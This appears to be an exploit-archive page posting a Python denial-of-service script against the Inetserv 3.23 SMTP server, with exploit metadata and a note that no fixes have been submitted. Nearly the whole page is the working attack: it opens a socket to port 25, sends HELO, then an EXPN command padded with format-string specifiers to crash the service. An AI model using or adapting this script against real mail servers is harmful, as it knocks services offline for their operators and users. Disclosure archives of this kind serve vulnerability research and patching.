Inetserv 3.23 SMTP Denial of Service Vulnerability

2011-01-23 09:15:33

#!/usr/bin/python
# Exploit Title: Inetserv 3.23 SMTP DoS
# Date: 1/22/2011
# Author: G13
# Software Link: http://www.avtronics.net/inetserv.php
# Version: 3.23
# Tested on: WinXP SP0 Eng

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = "EXPN " + "%s" * 40 + "\r\n"

s.connect(('127.0.0.1',25))

data=s.recv(1024)
s.send("HELO\r\n")

s.send(buffer)

s.send("HELP\r\n")
s.close()

Fixes

No fixes

In order to submit a new fix you need to be registered.